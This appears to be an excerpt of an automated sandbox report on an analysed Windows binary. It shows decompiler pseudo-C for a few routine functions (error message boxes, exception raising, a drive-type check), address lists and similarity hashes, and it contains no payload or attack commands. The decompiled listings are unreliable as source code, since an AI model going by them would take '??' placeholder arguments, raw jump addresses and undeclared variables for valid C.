                                                                                                                                                                                                                                                        0x7ff6e5ace51a
                                                                                                                                                                                                                                                        0x7ff6e5ace521
                                                                                                                                                                                                                                                        0x7ff6e5ace524
                                                                                                                                                                                                                                                        0x7ff6e5ace52e
                                                                                                                                                                                                                                                        0x7ff6e5ace533
                                                                                                                                                                                                                                                        0x7ff6e5ace539
                                                                                                                                                                                                                                                        0x7ff6e5ace553
                                                                                                                                                                                                                                                        0x7ff6e5ace55c
                                                                                                                                                                                                                                                        0x7ff6e5ace564
                                                                                                                                                                                                                                                        0x7ff6e5ace574
                                                                                                                                                                                                                                                        0x7ff6e5ace577
                                                                                                                                                                                                                                                        0x7ff6e5ace57a
                                                                                                                                                                                                                                                        0x7ff6e5ace586
                                                                                                                                                                                                                                                        0x7ff6e5ace58d
                                                                                                                                                                                                                                                        0x7ff6e5ace593
                                                                                                                                                                                                                                                        0x7ff6e5ace5a2
                                                                                                                                                                                                                                                        0x7ff6e5ace5a4
                                                                                                                                                                                                                                                        0x7ff6e5ace5a9
                                                                                                                                                                                                                                                        0x7ff6e5ace5af
                                                                                                                                                                                                                                                        0x7ff6e5ace5b4
                                                                                                                                                                                                                                                        0x7ff6e5ace5bb
                                                                                                                                                                                                                                                        0x7ff6e5ace5c9
                                                                                                                                                                                                                                                        0x7ff6e5ace5cc
                                                                                                                                                                                                                                                        0x7ff6e5ace5d2
                                                                                                                                                                                                                                                        0x7ff6e5ace5d7
                                                                                                                                                                                                                                                        0x7ff6e5ace5fd

                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.376513692.00007FF6E5AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E5AB0000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376485844.00007FF6E5AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376830179.00007FF6E5ADA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376996075.00007FF6E5AED000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376996075.00007FF6E5AFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5AFE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5B16000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5B43000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6e5ab0000_322pVOVprx.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: CurrentDirectory
                                                                                                                                                                                                                                                        • String ID: :
                                                                                                                                                                                                                                                        • API String ID: 1611563598-336475711
                                                                                                                                                                                                                                                        • Opcode ID: 7e3fbc63b5ac761adeefeaf1db97b0bd4b4ee20021ab85a6aae9d1ffd03339af
                                                                                                                                                                                                                                                        • Instruction ID: 6bc2db25d9c9cdffa45abb1278a3b5702267422029c00f11ba3e90005b3c0736
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7e3fbc63b5ac761adeefeaf1db97b0bd4b4ee20021ab85a6aae9d1ffd03339af
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A921E163B0868581EB219B19D06436D63A1FF88F44F454035CA4DCB284EF7EED848B56
                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                        C-Code - Quality: 58%
                                                                                                                                                                                                                                                        			E00007FF67FF6E5AB2880(void* __rax, long long __rcx, long long __rdx, long long __r8, long long __r9, long long _a8, long long _a16, long long _a24, char _a32, char _a1056, char _a3104, signed int _a5152, char _a5208) {
                                                                                                                                                                                                                                                        				void* __rbx;
                                                                                                                                                                                                                                                        				void* _t19;
                                                                                                                                                                                                                                                        				void* _t30;
                                                                                                                                                                                                                                                        				void* _t31;
                                                                                                                                                                                                                                                        				signed long long _t35;
                                                                                                                                                                                                                                                        				signed long long _t36;
                                                                                                                                                                                                                                                        				void* _t53;
                                                                                                                                                                                                                                                        				void* _t54;
                                                                                                                                                                                                                                                        				void* _t62;
                                                                                                                                                                                                                                                        				void* _t63;
                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                        				_t57 = __r8;
                                                                                                                                                                                                                                                        				_a8 = __rcx;
                                                                                                                                                                                                                                                        				_a16 = __rdx;
                                                                                                                                                                                                                                                        				_a24 = __r8;
                                                                                                                                                                                                                                                        				_a32 = __r9;
                                                                                                                                                                                                                                                        				_t19 = E00007FF67FF6E5ABADB0(0x1448, __rax, _t62, _t63);
                                                                                                                                                                                                                                                        				_t55 = _t54 - __rax;
                                                                                                                                                                                                                                                        				_t35 =  *0xe5aed018; // 0x33daea0d3843
                                                                                                                                                                                                                                                        				_t36 = _t35 ^ _t54 - __rax;
                                                                                                                                                                                                                                                        				_a5152 = _t36;
                                                                                                                                                                                                                                                        				_t37 = __rcx;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AB1040(_t19);
                                                                                                                                                                                                                                                        				_a24 =  &_a5208;
                                                                                                                                                                                                                                                        				_a16 = 0;
                                                                                                                                                                                                                                                        				r8d = 0x400;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AC3BE4(_t30, _t31,  *_t36 | 0x00000002,  &_a32, __r8, __rcx);
                                                                                                                                                                                                                                                        				r8d = 0x800;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5ABC210();
                                                                                                                                                                                                                                                        				r8d = 0x400;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AB7A30(_t36, __rcx,  &_a3104,  &_a32, _t53, __r8);
                                                                                                                                                                                                                                                        				if (_t36 == 0) goto 0xe5ab2959;
                                                                                                                                                                                                                                                        				r8d = 0x400;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AB7A30(_t36, _t37,  &_a1056, "Error detected", _t53, _t57);
                                                                                                                                                                                                                                                        				r9d = 0x30;
                                                                                                                                                                                                                                                        				MessageBoxW(??, ??, ??, ??);
                                                                                                                                                                                                                                                        				goto 0xe5ab2973;
                                                                                                                                                                                                                                                        				r9d = 0x30;
                                                                                                                                                                                                                                                        				return E00007FF67FF6E5ABAD80(MessageBoxA(??, ??, ??, ??), 0, _a5152 ^ _t55);
                                                                                                                                                                                                                                                        			}













                                                                                                                                                                                                                                                        0x7ff6e5ab2880
                                                                                                                                                                                                                                                        0x7ff6e5ab2880
                                                                                                                                                                                                                                                        0x7ff6e5ab2885
                                                                                                                                                                                                                                                        0x7ff6e5ab288a
                                                                                                                                                                                                                                                        0x7ff6e5ab288f
                                                                                                                                                                                                                                                        0x7ff6e5ab289b
                                                                                                                                                                                                                                                        0x7ff6e5ab28a0
                                                                                                                                                                                                                                                        0x7ff6e5ab28a3
                                                                                                                                                                                                                                                        0x7ff6e5ab28aa
                                                                                                                                                                                                                                                        0x7ff6e5ab28ad
                                                                                                                                                                                                                                                        0x7ff6e5ab28b5
                                                                                                                                                                                                                                                        0x7ff6e5ab28c0
                                                                                                                                                                                                                                                        0x7ff6e5ab28c5
                                                                                                                                                                                                                                                        0x7ff6e5ab28d2
                                                                                                                                                                                                                                                        0x7ff6e5ab28db
                                                                                                                                                                                                                                                        0x7ff6e5ab28e8
                                                                                                                                                                                                                                                        0x7ff6e5ab28f7
                                                                                                                                                                                                                                                        0x7ff6e5ab28fd
                                                                                                                                                                                                                                                        0x7ff6e5ab2902
                                                                                                                                                                                                                                                        0x7ff6e5ab2915
                                                                                                                                                                                                                                                        0x7ff6e5ab291d
                                                                                                                                                                                                                                                        0x7ff6e5ab291f
                                                                                                                                                                                                                                                        0x7ff6e5ab2934
                                                                                                                                                                                                                                                        0x7ff6e5ab2939
                                                                                                                                                                                                                                                        0x7ff6e5ab2951
                                                                                                                                                                                                                                                        0x7ff6e5ab2957
                                                                                                                                                                                                                                                        0x7ff6e5ab2959
                                                                                                                                                                                                                                                        0x7ff6e5ab298c

                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.376513692.00007FF6E5AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E5AB0000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376485844.00007FF6E5AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376830179.00007FF6E5ADA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376996075.00007FF6E5AED000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376996075.00007FF6E5AFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5AFE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5B16000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5B43000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6e5ab0000_322pVOVprx.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: Message$ByteCharMultiWide
                                                                                                                                                                                                                                                        • String ID: Error detected
                                                                                                                                                                                                                                                        • API String ID: 1878133881-3513342764
                                                                                                                                                                                                                                                        • Opcode ID: 412921116a21d042ea7cc01f3b6226aa372ad23cfa1aaecee88db1efd33321aa
                                                                                                                                                                                                                                                        • Instruction ID: e6b002bfee0b8dae5ff5f7b51b772757b01ee9843222e2c44488d011ea44249f
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 412921116a21d042ea7cc01f3b6226aa372ad23cfa1aaecee88db1efd33321aa
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1F21C97372868551E760EB14F4617EA6360FF84B88F804035EA8DC7659CF3DD605CB85
                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                        C-Code - Quality: 58%
                                                                                                                                                                                                                                                        			E00007FF67FF6E5AB2770(void* __rax, long long __rcx, long long __rdx, long long __r8, long long __r9, long long _a8, long long _a16, long long _a24, char _a32, char _a1056, char _a3104, signed int _a5152, char _a5208) {
                                                                                                                                                                                                                                                        				void* __rbx;
                                                                                                                                                                                                                                                        				void* _t19;
                                                                                                                                                                                                                                                        				void* _t30;
                                                                                                                                                                                                                                                        				void* _t31;
                                                                                                                                                                                                                                                        				signed long long _t35;
                                                                                                                                                                                                                                                        				signed long long _t36;
                                                                                                                                                                                                                                                        				void* _t53;
                                                                                                                                                                                                                                                        				void* _t54;
                                                                                                                                                                                                                                                        				void* _t62;
                                                                                                                                                                                                                                                        				void* _t63;
                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                        				_t57 = __r8;
                                                                                                                                                                                                                                                        				_a8 = __rcx;
                                                                                                                                                                                                                                                        				_a16 = __rdx;
                                                                                                                                                                                                                                                        				_a24 = __r8;
                                                                                                                                                                                                                                                        				_a32 = __r9;
                                                                                                                                                                                                                                                        				_t19 = E00007FF67FF6E5ABADB0(0x1448, __rax, _t62, _t63);
                                                                                                                                                                                                                                                        				_t55 = _t54 - __rax;
                                                                                                                                                                                                                                                        				_t35 =  *0xe5aed018; // 0x33daea0d3843
                                                                                                                                                                                                                                                        				_t36 = _t35 ^ _t54 - __rax;
                                                                                                                                                                                                                                                        				_a5152 = _t36;
                                                                                                                                                                                                                                                        				_t37 = __rcx;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AB1040(_t19);
                                                                                                                                                                                                                                                        				_a24 =  &_a5208;
                                                                                                                                                                                                                                                        				_a16 = 0;
                                                                                                                                                                                                                                                        				r8d = 0x400;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AC3BE4(_t30, _t31,  *_t36 | 0x00000002,  &_a32, __r8, __rcx);
                                                                                                                                                                                                                                                        				r8d = 0x800;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5ABC210();
                                                                                                                                                                                                                                                        				r8d = 0x400;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AB7A30(_t36, __rcx,  &_a3104,  &_a32, _t53, __r8);
                                                                                                                                                                                                                                                        				if (_t36 == 0) goto 0xe5ab2849;
                                                                                                                                                                                                                                                        				r8d = 0x400;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AB7A30(_t36, _t37,  &_a1056, "Fatal error detected", _t53, _t57);
                                                                                                                                                                                                                                                        				r9d = 0x30;
                                                                                                                                                                                                                                                        				MessageBoxW(??, ??, ??, ??);
                                                                                                                                                                                                                                                        				goto 0xe5ab2863;
                                                                                                                                                                                                                                                        				r9d = 0x30;
                                                                                                                                                                                                                                                        				return E00007FF67FF6E5ABAD80(MessageBoxA(??, ??, ??, ??), 0, _a5152 ^ _t55);
                                                                                                                                                                                                                                                        			}













                                                                                                                                                                                                                                                        0x7ff6e5ab2770
                                                                                                                                                                                                                                                        0x7ff6e5ab2770
                                                                                                                                                                                                                                                        0x7ff6e5ab2775
                                                                                                                                                                                                                                                        0x7ff6e5ab277a
                                                                                                                                                                                                                                                        0x7ff6e5ab277f
                                                                                                                                                                                                                                                        0x7ff6e5ab278b
                                                                                                                                                                                                                                                        0x7ff6e5ab2790
                                                                                                                                                                                                                                                        0x7ff6e5ab2793
                                                                                                                                                                                                                                                        0x7ff6e5ab279a
                                                                                                                                                                                                                                                        0x7ff6e5ab279d
                                                                                                                                                                                                                                                        0x7ff6e5ab27a5
                                                                                                                                                                                                                                                        0x7ff6e5ab27b0
                                                                                                                                                                                                                                                        0x7ff6e5ab27b5
                                                                                                                                                                                                                                                        0x7ff6e5ab27c2
                                                                                                                                                                                                                                                        0x7ff6e5ab27cb
                                                                                                                                                                                                                                                        0x7ff6e5ab27d8
                                                                                                                                                                                                                                                        0x7ff6e5ab27e7
                                                                                                                                                                                                                                                        0x7ff6e5ab27ed
                                                                                                                                                                                                                                                        0x7ff6e5ab27f2
                                                                                                                                                                                                                                                        0x7ff6e5ab2805
                                                                                                                                                                                                                                                        0x7ff6e5ab280d
                                                                                                                                                                                                                                                        0x7ff6e5ab280f
                                                                                                                                                                                                                                                        0x7ff6e5ab2824
                                                                                                                                                                                                                                                        0x7ff6e5ab2829
                                                                                                                                                                                                                                                        0x7ff6e5ab2841
                                                                                                                                                                                                                                                        0x7ff6e5ab2847
                                                                                                                                                                                                                                                        0x7ff6e5ab2849
                                                                                                                                                                                                                                                        0x7ff6e5ab287c

                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.376513692.00007FF6E5AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E5AB0000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376485844.00007FF6E5AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376830179.00007FF6E5ADA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376996075.00007FF6E5AED000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376996075.00007FF6E5AFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5AFE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5B16000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5B43000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6e5ab0000_322pVOVprx.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: Message$ByteCharMultiWide
                                                                                                                                                                                                                                                        • String ID: Fatal error detected
                                                                                                                                                                                                                                                        • API String ID: 1878133881-4025702859
                                                                                                                                                                                                                                                        • Opcode ID: f7448773671dbda672e22a82cfe80c2e0aa70ed18289780b2b9e604a2b102c49
                                                                                                                                                                                                                                                        • Instruction ID: 971a8aeea2e770cacf9d561d928d65b5879acf3a48a26bfd450b2eb6de07fe45
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f7448773671dbda672e22a82cfe80c2e0aa70ed18289780b2b9e604a2b102c49
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: CB21C77372868591EB60EB54F4617EA6360FF84B88F804036EA8DC7A58CF3DD605CB85
                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.376513692.00007FF6E5AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E5AB0000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376485844.00007FF6E5AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376830179.00007FF6E5ADA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376996075.00007FF6E5AED000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376996075.00007FF6E5AFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5AFE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5B16000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5B43000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6e5ab0000_322pVOVprx.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: ExceptionFileHeaderRaise
                                                                                                                                                                                                                                                        • String ID: csm
                                                                                                                                                                                                                                                        • API String ID: 2573137834-1018135373
                                                                                                                                                                                                                                                        • Opcode ID: a9ac3328ea6075577af066dd04772514ea360050604432a87b0551bd96b2ca6b
                                                                                                                                                                                                                                                        • Instruction ID: c74edcd516bb5ef7d42d15aa2050589c83d61e1521b1cd8c696d50a6604b4d36
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a9ac3328ea6075577af066dd04772514ea360050604432a87b0551bd96b2ca6b
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B2112E32608B4582EB619F29E45026977A4FF88F98F184230EE8D87768DF3DD9518B44
                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                                                                        			E00007FF67FF6E5ACF00C(void* __ecx) {
                                                                                                                                                                                                                                                        				signed int _v16;
                                                                                                                                                                                                                                                        				signed long long _t11;
                                                                                                                                                                                                                                                        				signed long long _t12;
                                                                                                                                                                                                                                                        				signed long long _t15;
                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                        				_t8 = __ecx;
                                                                                                                                                                                                                                                        				_t11 =  *0xe5aed018; // 0x33daea0d3843
                                                                                                                                                                                                                                                        				_t12 = _t11 ^ _t15;
                                                                                                                                                                                                                                                        				_v16 = _t12;
                                                                                                                                                                                                                                                        				if (__ecx - 0x1a <= 0) goto 0xe5acf056;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AC4424(_t12);
                                                                                                                                                                                                                                                        				 *_t12 = 0xf;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AC4444(_t12);
                                                                                                                                                                                                                                                        				 *_t12 = 0xd;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AC9DB0();
                                                                                                                                                                                                                                                        				return E00007FF67FF6E5ABAD80(0, _t8, _v16 ^ _t15);
                                                                                                                                                                                                                                                        			}







                                                                                                                                                                                                                                                        0x7ff6e5acf00c
                                                                                                                                                                                                                                                        0x7ff6e5acf012
                                                                                                                                                                                                                                                        0x7ff6e5acf019
                                                                                                                                                                                                                                                        0x7ff6e5acf01c
                                                                                                                                                                                                                                                        0x7ff6e5acf024
                                                                                                                                                                                                                                                        0x7ff6e5acf026
                                                                                                                                                                                                                                                        0x7ff6e5acf02b
                                                                                                                                                                                                                                                        0x7ff6e5acf031
                                                                                                                                                                                                                                                        0x7ff6e5acf036
                                                                                                                                                                                                                                                        0x7ff6e5acf03c
                                                                                                                                                                                                                                                        0x7ff6e5acf055

                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.376513692.00007FF6E5AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E5AB0000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376485844.00007FF6E5AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376830179.00007FF6E5ADA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376996075.00007FF6E5AED000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376996075.00007FF6E5AFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5AFE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5B16000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5B43000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6e5ab0000_322pVOVprx.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: DriveType_invalid_parameter_noinfo
                                                                                                                                                                                                                                                        • String ID: :
                                                                                                                                                                                                                                                        • API String ID: 2595371189-336475711
                                                                                                                                                                                                                                                        • Opcode ID: f8eec6a66f3a594e824ddea09938586a7cad5545a492e04bdbecb8d953b03adc
                                                                                                                                                                                                                                                        • Instruction ID: 1f8284890bbf4618cdde6971ae051f8798b05973dc8917ce761bc1b68fb09ec5
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f8eec6a66f3a594e824ddea09938586a7cad5545a492e04bdbecb8d953b03adc
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2B01D423B1820286FB31AF28947137E23A0EF44F08F441039D60DCA291EF3EE944DA1E
                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%